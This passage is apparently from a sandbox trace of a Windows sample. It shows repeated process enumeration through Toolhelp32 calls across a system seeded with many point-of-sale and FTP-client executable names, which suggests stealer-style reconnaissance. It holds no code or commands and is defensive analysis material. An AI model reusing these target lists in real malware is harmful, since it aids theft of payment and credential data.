cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0146.526] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0146.529] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0146.531] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0146.534] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0146.537] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0146.539] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0146.542] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0146.544] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0146.547] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0146.549] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0146.551] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0146.554] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0146.556] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0146.559] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0146.561] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0146.568] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0146.570] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0146.573] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0146.575] Process32Next (in: hSnapshot=0x14c8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x7c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0146.577] CloseHandle (hObject=0x14c8) returned 1 [0146.577] Sleep (dwMilliseconds=0x64) [0146.679] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b64 [0146.699] Process32First (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.701] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0146.708] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0146.710] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.712] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0146.714] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0146.716] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0146.718] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0146.784] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0146.787] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.789] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.791] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0146.795] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.797] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.799] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.801] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.804] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.806] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.808] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.810] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0146.812] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0146.815] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0146.817] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0146.867] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.869] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0146.871] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0146.873] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0146.876] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0146.878] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0146.881] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0146.883] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.885] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0146.887] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0146.890] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0146.892] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0146.894] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0146.896] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0146.898] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0146.900] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0146.933] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0146.936] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0146.938] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0146.940] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0146.942] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0146.944] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0146.947] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0146.950] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0146.952] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0146.954] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0146.956] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0146.958] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0146.960] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0146.962] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0146.968] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0146.976] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0146.978] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0146.981] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0146.984] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0146.986] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0146.988] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0146.990] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0146.993] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0146.995] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0146.997] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0146.999] Process32Next (in: hSnapshot=0x1b64, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, 